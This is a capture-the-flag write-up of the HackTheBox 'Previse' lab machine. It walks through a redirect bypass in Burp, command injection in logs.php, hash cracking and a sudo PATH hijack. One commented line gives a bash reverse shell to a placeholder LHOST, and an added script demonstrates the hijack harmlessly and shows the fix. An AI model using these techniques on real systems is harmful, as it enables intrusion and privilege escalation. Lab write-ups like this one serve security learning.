HackTheBox Writeup — Previse
Hello Guys, I am Faisal Husaini. My username on HTB is "fa1sal". Also join me on Discord.
The IP of this box is 10.10.11.104
Port Scan / Enumeration
nmap -sC -sV -p- -Pn --min-rate=10000 -oN nmap 10.10.11.104
Way to User
Browsing to the web server, we get redirected to a login page.
Running a Gobuster scan against the web server reveals multiple files that answer with a 302 status code.
Trying each of them redirects back to the login page as expected, so I intercept the request for the accounts.php file in Burp.
Intercepting the response to that request shows that it redirects to login.php as well, but the response body still carries the full accounts.php page: the server keeps rendering the page after sending the Location header, and only the browser honours the redirect.
Changing the status code from 302 Found to 200 OK in the response and forwarding it.
The login redirect is bypassed and the accounts.php page is shown for that request; it contains a form for registering a new user.
Adding a new user and intercepting the request once again.
Intercepting the response to this request as well and changing the status code, so the registration completes instead of being sent back to the login page.
To avoid repeating these steps by hand, add a match-and-replace rule in Burp's proxy settings that rewrites "302 Found" to "200 OK" in response headers for all pages.
My new user is created successfully.
After logging in with the new user, I can reach more functionality of the site; the interesting part is the Files section, where a site backup file is available for download.
Downloading the site backup to my local machine and unzipping it.
One of the files, config.php, contains database credentials, but at the moment they cannot be used anywhere since we have no access to the database yet.
Another file, logs.php, is more interesting: it passes a POST parameter named delim into the exec function without any sanitization, which is a command injection.
Intercepting the request for logs.php in Burp.
Changing the request method from GET to POST and adding the delim parameter with a ping command back to my machine as its value.
A tcpdump capture on my machine confirms command execution, as the ping comes back.
Changing the value to a reverse shell payload this time.
Getting a reverse shell on my netcat listener.
Finding the user flag in the home folder of the m4lwhere user.
Checking for locally listening ports, we can see that the MySQL port is open.
So I use the credentials from config.php to log in to the database as the root user.
Dumping the users and their hashes from the database.
Using John to crack the hash of the m4lwhere user.
Switching to the new user with the su command.
Way to Root
Running sudo -l, we can see that the user m4lwhere can run the access_backup.sh script with sudo.
Checking the contents of the file, we see that it runs the gzip command and also calls date; since neither command is referenced by its absolute path, both are resolved through PATH and can be hijacked. For this to work through sudo, the caller's PATH has to survive: if the Defaults line in the sudo -l output contains secure_path, sudo replaces PATH and the trick fails.
So first I change the PATH environment variable to put the current user's home directory first.
Creating a file called date in that directory containing my reverse shell payload and making it executable.
Running the script with sudo leads to a reverse shell as root on my netcat listener.
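Reproducing the PATH hijack locally, as an added example rather than anything taken from the box: the script written here is a stand-in for access_backup.sh that only shares the flaw described above (gzip and date resolved through PATH), and the planted date drops a marker file instead of a reverse shell so the outcome can be checked offline. The attacker's sequence on the box is kept as comments at the top; the hardened version shows the fix.

```shell
#!/usr/bin/env bash
# Added example (not from the writeup): reproduce the PATH hijack with
# throwaway files, then show the fix. The script written below is a
# stand-in for access_backup.sh that only shares the flaw the writeup
# describes (date and gzip called by bare name); it is not the box's file.

# On the box, the attacker's sequence from the writeup is:
#   export PATH=$HOME:$PATH
#   printf '#!/bin/bash\nbash -i >& /dev/tcp/LHOST/LPORT 0>&1\n' > ~/date
#   chmod 755 ~/date
#   sudo <path to access_backup.sh as listed by sudo -l>
# It only works if sudo passes the caller's PATH through: a Defaults line
# with secure_path in the sudo -l output replaces PATH and defeats it.

# make_victim DIR: stand-in script that resolves date and gzip via PATH.
make_victim() {
    cat > "$1/access_backup.sh" <<'EOF'
#!/bin/sh
stamp=$(date +%Y%m%d)
printf 'access log\n' | gzip > /dev/null
echo "backup done $stamp"
EOF
    chmod 755 "$1/access_backup.sh"
}

# make_hardened DIR: the fix. Set PATH explicitly at the top so the
# caller's PATH is irrelevant (calling /bin/date and /bin/gzip by absolute
# path is the equivalent belt-and-braces form).
make_hardened() {
    cat > "$1/access_backup.sh" <<'EOF'
#!/bin/sh
PATH=/usr/bin:/bin
export PATH
stamp=$(date +%Y%m%d)
printf 'access log\n' | gzip > /dev/null
echo "backup done $stamp"
EOF
    chmod 755 "$1/access_backup.sh"
}

# plant_fake DIR NAME: the attacker's binary. Instead of a reverse shell it
# appends a marker line so the outcome can be checked offline.
plant_fake() {
    cat > "$1/$2" <<EOF
#!/bin/sh
echo "hijacked-$2" >> "$1/marker"
EOF
    chmod 755 "$1/$2"
}

# run_hijack DIR: prepend the writable directory to PATH, run the script,
# and report which date answered ("none" means the real one did).
run_hijack() {
    PATH="$1:$PATH" "$1/access_backup.sh" > /dev/null 2>&1 || true
    cat "$1/marker" 2>/dev/null || echo none
}

# demo: run the attack against both scripts in a temp dir and report.
demo() {
    local dir vuln hard
    dir=$(mktemp -d)
    plant_fake "$dir" date
    make_victim "$dir";   vuln=$(run_hijack "$dir"); rm -f "$dir/marker"
    make_hardened "$dir"; hard=$(run_hijack "$dir")
    rm -rf "$dir"
    printf 'vulnerable:%s hardened:%s\n' "$vuln" "$hard"
}

if [ "${1:-}" = "--demo" ]; then demo; fi    # ./path_hijack.sh --demo
```

Running it with --demo prints which binary each script ended up executing; the vulnerable stand-in runs the planted date, the hardened one does not. The fix is the PATH reset at the top of the script, which is what makes a sudo entry for a shell script safe regardless of what the caller exports.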
The root flag is in the /root directory.